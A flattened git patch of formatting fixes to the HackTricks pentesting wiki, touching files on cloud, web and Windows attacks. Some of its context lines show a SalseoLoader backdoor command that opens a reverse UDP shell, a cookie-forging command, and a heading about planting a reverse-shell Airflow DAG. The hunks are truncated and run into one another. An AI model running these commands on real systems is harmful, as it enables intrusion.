From cf6fcec19a92756c513be2c6a4c38b9e7032d2b6 Mon Sep 17 00:00:00 2001 
From: carlospolop Date: Tue, 5 Apr 2022 18:24:52 -0400 Subject: [PATCH] fix bad chars --- 1911-pentesting-fox.md | 2 +- README.md | 2 +- .../bra.i.nsmasher-presentation/README.md | 6 +- .../bim-bruteforcer.md | 2 +- .../ml-basics/feature-engineering.md | 4 +- about-the-author.md | 4 +- backdoors/salseo.md | 2 +- .../blockchain-and-crypto-currencies.md | 12 +- brute-force.md | 11 +- cloud-security/apache-airflow/README.md | 6 +- .../apache-airflow/airflow-configuration.md | 6 +- cloud-security/aws-security.md | 54 +++--- cloud-security/circleci.md | 4 +- .../concourse/concourse-lab-creation.md | 2 +- .../gcp-privesc-to-other-principals.md | 6 +- ...local-privilege-escalation-ssh-pivoting.md | 4 +- cloud-security/gcp-security/gcp-looting.md | 2 +- .../gcp-security/gcp-persistance.md | 4 +- cloud-security/github-security/README.md | 6 +- .../basic-github-information.md | 2 +- .../README.md | 2 +- .../kubernetes-access-to-other-clouds.md | 4 +- .../kubernetes-enumeration.md | 4 +- .../kubernetes-network-attacks.md | 4 +- cloud-security/workspace-security.md | 12 +- ...d-elearnsecurity-certifications-reviews.md | 10 +- cryptography/certificates.md | 2 +- .../cipher-block-chaining-cbc-mac-priv.md | 2 +- cryptography/crypto-ctfs-tricks.md | 6 +- cryptography/hash-length-extension-attack.md | 2 +- cryptography/rc4-encrypt-and-decrypt.md | 2 +- emails-vulns.md | 4 +- exfiltration.md | 2 +- .../linux-exploiting-basic-esp/README.md | 10 +- .../rop-leaking-libc-address/README.md | 4 +- exploiting/tools/README.md | 6 +- exploiting/tools/pwntools.md | 68 +++---- external-recon-methodology.md | 24 +-- external-recon-methodology/README.md | 12 +- .../malware-analysis.md | 12 +- .../volatility-examples.md | 2 +- .../file-data-carving-recovery-tools.md | 2 +- .../partitions-file-systems-carving/ntfs.md | 2 +- .../pcap-inspection/README.md | 10 +- .../pcap-inspection/wireshark-tricks.md | 6 +- .../.pyc.md | 2 +- .../browser-artifacts.md | 10 +- .../office-file-analysis.md | 2 +- 
.../windows-forensics/README.md | 6 +- .../interesting-windows-registry-keys.md | 12 +- .../linux-privilege-escalation-checklist.md | 8 +- linux-unix/privilege-escalation/README.md | 16 +- ...-command-injection-privilege-escalation.md | 2 +- .../docker-breakout/README.md | 6 +- .../docker-breakout/apparmor.md | 2 +- ...uthn-docker-access-authorization-plugin.md | 2 +- .../docker-breakout-privilege-escalation.md | 10 +- .../docker-breakout/docker-privileged.md | 2 +- .../electron-cef-chromium-debugger-abuse.md | 2 +- .../escaping-from-limited-bash.md | 10 +- .../interesting-groups-linux-pe/README.md | 2 +- .../ld.so.conf-example.md | 4 +- .../linux-capabilities.md | 4 +- .../nfs-no_root_squash-misconfiguration-pe.md | 2 +- .../splunk-lpe-and-persistence.md | 4 +- .../ssh-forward-agent-exploitation.md | 2 +- .../wildcards-spare-tricks.md | 2 +- .../README.md | 34 ++-- .../mac-os-architecture.md | 18 +- ...s-apps-inspecting-debugging-and-fuzzing.md | 18 +- .../macos-mdm/README.md | 2 +- ...nrolling-devices-in-other-organisations.md | 2 +- .../macos-protocols.md | 6 +- .../macos-red-teaming.md | 4 +- misc/basic-python/README.md | 4 +- .../bypass-python-sandboxes/README.md | 12 +- misc/basic-python/magic-methods.md | 4 +- .../android-app-pentesting/README.md | 30 ++-- .../android-app-pentesting/adb-commands.md | 2 +- .../android-applications-basics.md | 6 +- .../android-burp-suite-settings.md | 2 +- .../android-task-hijacking.md | 6 +- .../android-app-pentesting/apk-decompilers.md | 4 +- .../avd-android-virtual-device.md | 8 +- .../content-protocol.md | 2 +- .../exploiting-content-providers.md | 4 +- .../exploiting-a-debuggeable-applciation.md | 2 +- .../frida-tutorial/README.md | 4 +- .../frida-tutorial/frida-tutorial-2.md | 4 +- .../frida-tutorial/owaspuncrackable-1.md | 6 +- .../google-ctf-2018-shall-we-play-a-game.md | 2 +- .../inspeckage-tutorial.md | 2 +- .../intent-injection.md | 4 +- .../react-native-application.md | 2 +- 
.../android-app-pentesting/smali-changes.md | 4 +- .../spoofing-your-location-in-play-store.md | 2 +- .../android-app-pentesting/webview-attacks.md | 2 +- mobile-apps-pentesting/android-checklist.md | 6 +- .../ios-pentesting-checklist.md | 6 +- .../ios-pentesting/README.md | 16 +- .../basic-ios-testing-operations.md | 6 +- .../burp-configuration-for-ios.md | 2 +- ...-entitlements-from-compiled-application.md | 2 +- .../ios-pentesting/ios-app-extensions.md | 2 +- .../ios-pentesting/ios-basics.md | 2 +- ...m-uri-handlers-deeplinks-custom-schemes.md | 2 +- .../ios-hooking-with-objection.md | 4 +- .../ios-pentesting/ios-testing-environment.md | 10 +- .../ios-pentesting/ios-uipasteboard.md | 2 +- .../ios-pentesting/ios-universal-links.md | 2 +- .../ios-pentesting/ios-webviews.md | 10 +- other-web-tricks.md | 2 +- pentesting-methodology.md | 4 +- pentesting-web/cache-deception.md | 6 +- pentesting-web/clickjacking.md | 4 +- .../client-side-template-injection-csti.md | 14 +- pentesting-web/command-injection.md | 4 +- .../content-security-policy-csp-bypass.md | 38 ++-- pentesting-web/cors-bypass.md | 4 +- pentesting-web/crlf-0d-0a.md | 2 +- .../cross-site-websocket-hijacking-cswsh.md | 6 +- .../README.md | 6 +- pentesting-web/deserialization/README.md | 28 +-- ...ialization-objectinputstream-readobject.md | 2 +- ...ploiting-__viewstate-knowing-the-secret.md | 4 +- .../exploiting-__viewstate-parameter.md | 8 +- ...g-and-directory-interface-and-log4shell.md | 4 +- .../python-yaml-deserialization.md | 2 +- pentesting-web/domain-subdomain-takeover.md | 2 +- pentesting-web/email-header-injection.md | 6 +- pentesting-web/file-inclusion/README.md | 6 +- pentesting-web/file-upload.md | 8 +- pentesting-web/file-upload/README.md | 12 +- pentesting-web/formula-injection.md | 2 +- pentesting-web/hacking-jwt-json-web-tokens.md | 2 +- .../hacking-with-cookies/cookie-tossing.md | 6 +- .../http-response-smuggling-desync.md | 2 +- pentesting-web/idor.md | 2 +- 
pentesting-web/oauth-to-account-takeover.md | 8 +- pentesting-web/parameter-pollution.md | 2 +- pentesting-web/race-condition.md | 2 +- .../registration-vulnerabilities.md | 2 +- ...ular-expression-denial-of-service-redos.md | 2 +- pentesting-web/reverse-tab-nabbing.md | 2 +- pentesting-web/sql-injection/README.md | 2 +- .../sql-injection/mssql-injection.md | 6 +- .../sql-injection/mysql-injection/README.md | 4 +- .../mysql-injection/mysql-ssrf.md | 2 +- .../sql-injection/oracle-injection.md | 2 +- .../postgresql-injection/README.md | 14 +- .../big-binary-files-upload-postgresql.md | 6 +- .../dblink-lo_import-data-exfiltration.md | 2 +- .../rce-with-postgresql-extensions.md | 2 +- pentesting-web/sql-injection/sqlmap/README.md | 2 +- .../sqlmap/second-order-injection-sqlmap.md | 2 +- .../README.md | 10 +- .../README.md | 12 +- .../el-expression-language.md | 4 +- .../unicode-normalization-vulnerability.md | 6 +- .../web-vulnerabilities-methodology.md | 118 ++++++------- .../xss-cross-site-scripting/README.md | 6 +- .../xss-cross-site-scripting/dom-xss.md | 30 ++-- .../xss-cross-site-scripting/pdf-injection.md | 166 +++++++++--------- .../xssi-cross-site-script-inclusion.md | 4 +- pentesting-web/xxe-xee-xml-external-entity.md | 4 +- .../README.md | 4 +- .../15672-pentesting-rabbitmq-management.md | 2 +- pentesting/1883-pentesting-mqtt-mosquitto.md | 4 +- pentesting/2375-pentesting-docker.md | 4 +- ...-24008-24009-49152-pentesting-glusterfs.md | 2 +- pentesting/27017-27018-mongodb.md | 2 +- pentesting/3260-pentesting-iscsi.md | 2 +- ...060-50070-50075-50090-pentesting-hadoop.md | 2 +- pentesting/512-pentesting-rexec.md | 2 +- .../515-pentesting-line-printer-daemon-lpd.md | 2 +- pentesting/554-8554-pentesting-rtsp.md | 2 +- pentesting/584-pentesting-afp.md | 2 +- pentesting/5984-pentesting-couchdb.md | 2 +- pentesting/5985-5986-pentesting-omi.md | 2 +- pentesting/5985-5986-pentesting-winrm.md | 2 +- pentesting/623-udp-ipmi.md | 4 +- pentesting/6379-pentesting-redis.md 
| 6 +- ...09-pentesting-apache-jserv-protocol-ajp.md | 2 +- pentesting/873-pentesting-rsync.md | 2 +- pentesting/9200-pentesting-elasticsearch.md | 2 +- pentesting/cassandra.md | 4 +- pentesting/pentesting-ftp/README.md | 2 +- ...entesting-jdwp-java-debug-wire-protocol.md | 6 +- .../harvesting-tickets-from-linux.md | 2 +- .../attacking-kubernetes-from-inside-a-pod.md | 10 +- .../kubernetes-basics.md | 6 +- .../kubernetes-hardening/README.md | 8 +- .../kubernetes-networkpolicies.md | 4 +- pentesting/pentesting-ldap.md | 2 +- .../pentesting-mssql-microsoft-sql-server.md | 4 +- pentesting/pentesting-mysql.md | 2 +- pentesting/pentesting-network/README.md | 18 +- pentesting/pentesting-network/ids-evasion.md | 2 +- .../spoofing-ssdp-and-upnp-devices.md | 16 +- pentesting/pentesting-ntp.md | 2 +- pentesting/pentesting-postgresql.md | 2 +- pentesting/pentesting-printers/README.md | 32 ++-- .../pentesting-printers/buffer-overflows.md | 2 +- .../credentials-disclosure-brute-force.md | 2 +- .../document-processing.md | 2 +- .../pentesting-printers/file-system-access.md | 2 +- .../pentesting-printers/memory-access.md | 2 +- .../pentesting-printers/physical-damage.md | 4 +- .../transmission-channel.md | 4 +- pentesting/pentesting-rsh.md | 2 +- pentesting/pentesting-smb.md | 8 +- pentesting/pentesting-smtp/README.md | 2 +- pentesting/pentesting-smtp/smtp-commands.md | 2 +- pentesting/pentesting-vnc.md | 2 +- .../pentesting-web/403-and-401-bypasses.md | 6 +- pentesting/pentesting-web/README.md | 10 +- .../artifactory-hacking-guide.md | 2 +- pentesting/pentesting-web/buckets/README.md | 2 +- pentesting/pentesting-web/buckets/aws-s3.md | 6 +- .../buckets/firebase-database.md | 2 +- pentesting/pentesting-web/cgi.md | 2 +- .../pentesting-web/code-review-tools.md | 2 +- pentesting/pentesting-web/flask.md | 2 +- pentesting/pentesting-web/graphql.md | 12 +- pentesting/pentesting-web/jboss.md | 5 +- pentesting/pentesting-web/jenkins.md | 4 +- pentesting/pentesting-web/moodle.md | 2 +- 
pentesting/pentesting-web/nginx.md | 20 +-- .../pentesting-web/php-tricks-esp/README.md | 2 +- .../README.md | 34 ++-- ...isable_functions-bypass-php-fpm-fastcgi.md | 8 +- .../pentesting-web/put-method-webdav.md | 2 +- .../pentesting-web/special-http-headers.md | 8 +- pentesting/pentesting-web/symphony.md | 8 +- .../pentesting-web/uncovering-cloudflare.md | 4 +- .../pentesting-web/web-api-pentesting.md | 18 +- pentesting/pentesting-web/wordpress.md | 8 +- pentesting/pentesting-wifi/README.md | 6 +- .../pentesting-wifi/evil-twin-eap-tls.md | 2 +- phishing-methodology/README.md | 6 +- phishing-methodology/phishing-documents.md | 4 +- .../escaping-from-gui-applications/README.md | 44 ++--- .../show-file-extensions.md | 2 +- physical-attacks/firmware-analysis/README.md | 26 +-- post-exploitation.md | 14 +- radio-hacking/pentesting-rfid.md | 2 +- reversing/cryptographic-algorithms/README.md | 6 +- .../reversing-tools-basic-methods/README.md | 20 +-- .../cheat-engine.md | 4 +- reversing/reversing-tools/README.md | 6 +- shells/shells/linux.md | 4 +- ...itive-information-disclosure-from-a-web.md | 4 +- todo/hardware-hacking/README.md | 4 +- todo/hardware-hacking/jtag.md | 2 +- todo/hardware-hacking/radio.md | 4 +- todo/hardware-hacking/spi.md | 2 +- todo/misc.md | 2 +- todo/more-tools.md | 2 +- .../active-directory-methodology/README.md | 8 +- .../acl-persistence-abuse.md | 6 +- .../ad-information-in-printers.md | 2 +- .../asreproast.md | 2 +- .../bloodhound.md | 2 +- .../constrained-delegation.md | 2 +- .../custom-ssp.md | 2 +- .../active-directory-methodology/dcshadow.md | 4 +- .../golden-ticket.md | 2 +- .../kerberos-authentication.md | 2 +- ...rivileged-accounts-and-token-privileges.md | 12 +- .../resource-based-constrained-delegation.md | 4 +- .../silver-ticket.md | 2 +- .../skeleton-key.md | 6 +- .../unconstrained-delegation.md | 6 +- .../authentication-credentials-uac-and-efs.md | 22 +-- windows/av-bypass.md | 2 +- windows/basic-cmd-for-pentesters.md | 2 +- 
.../checklist-windows-privilege-escalation.md | 6 +- windows/ntlm/README.md | 12 +- windows/ntlm/places-to-steal-ntlm-creds.md | 2 +- windows/stealing-credentials/README.md | 6 +- .../credentials-mimikatz.md | 6 +- .../README.md | 14 +- .../access-tokens.md | 6 +- ...ectory-permission-over-service-registry.md | 2 +- .../create-msi-with-wix.md | 2 +- .../dll-hijacking.md | 4 +- .../dpapi-extracting-passwords.md | 6 +- .../leaked-handle-exploitation.md | 8 +- .../named-pipe-client-impersonation.md | 4 +- .../privilege-escalation-abusing-tokens.md | 12 +- 290 files changed, 1036 insertions(+), 1034 deletions(-) diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 8a4cff8f..aa5b6879 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -2,7 +2,7 @@ And more services: -ubiquiti-discover udp "Ubiquiti Networks Device" +ubiquiti-discover udp "Ubiquiti Networks Device" dht udp "DHT Nodes" diff --git a/README.md b/README.md index ed061b74..202edcd6 100644 --- a/README.md +++ b/README.md 
@@ -24,7 +24,7 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai LinPEAS, WinPEAS and MacPEAS aren’t enough for you? **Welcome** [**The PEASS Family**](https://opensea.io/collection/the-peass-family), a limited collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) of our favourite PEASS in disguise, designed by my team. **Go get your favourite and make it yours!** And if you are a PEASS & HackTricks enthusiast, you can get your hands now on our [**custom swag**](https://peass.creator-spring.com) **and show how much you like our projects!** -You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ +You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. ## Corporate Sponsors 
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md index 857af5c2..17906e05 100644 --- a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md @@ -13,10 +13,10 @@ The platform, which is now in **beta** version, will also feature in the next fu All the **material and the techs for the exploitation of A.I. will be posted here** in a dedicated section of hacktricks. **While** we are in **beta** version and completing the implementation of all the above described features, the subscription and all the already posted labs with their relative **challenges are free**.\ -**So start learning how to exploit A.I. for free while you can in** [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)****\ -****ENJOY ;) +**So start learning how to exploit A.I. for free while you can in** [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)\ +ENJOY ;) -_A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_ +_A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_ > _Walter Miele from BrA.I.nsmasher_ diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md index 2fdaee8d..f7fc65e3 100644 --- a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md 
@@ -4,7 +4,7 @@ This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method. -It’s recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)\*\*\*\* +It’s recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR) To go deeper on the BIM topic:[ https://arxiv.org/pdf/1607.02533.pdf](https://arxiv.org/pdf/1607.02533.pdf) diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md index 8363778a..66f877a6 100644 --- a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md @@ -8,7 +8,7 @@ Data can be **continuous** (**infinity** values) or **categorical** (nominal) wh #### Binary -Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with: +Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with: ```python dataset["column2"] = dataset.column2.map({"T": 1, "F": 0}) 
@@ -214,7 +214,7 @@ It might happen that some complete random data is missing for some error. This i It could be that some random data is missing but there is something making some specific details more probable to be missing, for example more frequently man will tell their their age but not women. This is call **Missing at Random** (**MAR**). -Finally, there could be data **Missing Not at Random** (**MNAR**). The vale of the data is directly related with the probability of having the data. For example, if you want to measure something embarrassing, the most embarrassing someone is, the less probable he is going to share it. +Finally, there could be data **Missing Not at Random** (**MNAR**). The vale of the data is directly related with the probability of having the data. For example, if you want to measure something embarrassing, the most embarrassing someone is, the less probable he is going to share it. The **two first categories** of missing data can be **ignorable**. But the **third one** requires to consider **only portions of the data** that isn't impacted or to try to **model the missing data somehow**. diff --git a/about-the-author.md b/about-the-author.md index 542f8af2..f6a6bd88 100644 --- a/about-the-author.md +++ b/about-the-author.md @@ -15,7 +15,7 @@ I also wants to say **thanks to all the people that share cyber-security related * Relevant certifications: **OSCP, OSWE**, **CRTP, eMAPT, eWPTXv2** and Professional Drone pilot * I speak **Spanish** and **English** and little of French (some day I will improve that) * I'm a **CTF player** -* I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng)**** +* I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng) * And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking** ### Support HackTricks 
@@ -26,5 +26,5 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai LinPEAS, WinPEAS and MacPEAS aren’t enough for you? **Welcome** [**The PEASS Family**](https://opensea.io/collection/the-peass-family), a limited collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) of our favourite PEASS in disguise, designed by my team. **Go get your favourite and make it yours!** And if you are a PEASS & HackTricks enthusiast, you can get your hands now on our [**custom swag**](https://peass.creator-spring.com) **and show how much you like our projects!** -You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn abuot latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ +You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn abuot latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. 
diff --git a/backdoors/salseo.md b/backdoors/salseo.md index af053baa..93152447 100644 --- a/backdoors/salseo.md +++ b/backdoors/salseo.md @@ -62,7 +62,7 @@ SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp +# Find something like: # Remove that line and rezip the file zip -r file.xls . ``` diff --git a/cloud-security/apache-airflow/README.md b/cloud-security/apache-airflow/README.md index 0cccb827..62bcd86f 100644 --- a/cloud-security/apache-airflow/README.md +++ b/cloud-security/apache-airflow/README.md @@ -2,7 +2,7 @@ ## Basic Information -[**Apache Airflow**](https://airflow.apache.org) **** is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications. +[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications. Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**. 
@@ -10,7 +10,7 @@ Basically, Apache Airflow will allow you to **schedule de execution of code when ### Docker-Compose -You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) **** to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). +You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). ### Minikube @@ -65,7 +65,7 @@ flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '1 ### DAG Backdoor (RCE in Airflow worker) If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ -****Note that this reverse shell is going to be executed inside an **airflow worker container**: +Note that this reverse shell is going to be executed inside an **airflow worker container**: ```python import pendulum diff --git a/cloud-security/apache-airflow/airflow-configuration.md b/cloud-security/apache-airflow/airflow-configuration.md index ad1d40ca..f8147bc0 100644 --- a/cloud-security/apache-airflow/airflow-configuration.md +++ b/cloud-security/apache-airflow/airflow-configuration.md 
@@ -18,7 +18,7 @@ Some interesting values to check when reading the config file: * **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** * **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** * **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) **** a few options can be in place to configure who can access to the API: +* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** @@ -86,13 +86,13 @@ Some interesting values to check when reading the config file: ### Web Authentication -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as +By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as ```bash AUTH_TYPE = AUTH_DB ``` -Which means that the **authentication is checked against the database**. However, other configurations are possible like +Which means that the **authentication is checked against the database**. However, other configurations are possible like ```bash AUTH_TYPE = AUTH_OAUTH diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md index 3af52568..60be59c6 100644 --- a/cloud-security/aws-security.md +++ b/cloud-security/aws-security.md 
@@ -42,7 +42,7 @@ This could be a **real person** within your organization who requires access to * **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). Whenever you need to **change the Access Key** this is the process you should follow:\ -****_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ +_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ **MFA** is **supported** when using the AWS **CLI**. @@ -56,7 +56,7 @@ Roles are used to grant identities a set of permissions. **Roles don't have any An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access. -#### AWS Security Token Service (STS) +#### AWS Security Token Service (STS) This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users). @@ -64,7 +64,7 @@ This is a web service that enables you to **request temporary, limited-privilege #### Policy Permissions -Are used to assign permissions. There are 2 types: +Are used to assign permissions. There are 2 types: * AWS managed policies (preconfigured by AWS) * Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. 
@@ -143,7 +143,7 @@ The app uses the AssumeRoleWithWebIdentity to create temporary credentials. Howe ## KMS - Key Management Service - AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs) +AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs) KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\ KMS is a **region specific service**. @@ -241,7 +241,7 @@ It's possible to **enable S3 access login** (which by default is disabled) to so **Server-side encryption with S3 managed keys, SSE-S3:** This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. -* Encryption: +* Encryption: * Object Data + created plaintext DEK --> Encrypted data (stored inside S3) * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory * Decryption: 
@@ -250,7 +250,7 @@ It's possible to **enable S3 access login** (which by default is disabled) to so Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. -**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. +**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. * Encryption: * S3 request data keys from KMS CMK @@ -261,7 +261,7 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever * KMS decrypt the data key with the CMK and send it back to S3 * S3 decrypts the object data -**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. +**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. * Encryption: * The user sends the object data + Customer key to S3 
@@ -273,7 +273,7 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever * The key is validated against the HMAC value stored * The customer provided key is then used to decrypt the data -**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. +**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. * Encryption: * Client request for a data key to KMS @@ -285,9 +285,9 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK * The client can now decrypt the encrypted data -**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. +**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. -* Encryption: +* Encryption: * The client generates a DEK and encrypts the plaintext data * Then, using it's own custom CMK it encrypts the DEK * submit the encrypted data + encrypted DEK to S3 where it's stored 
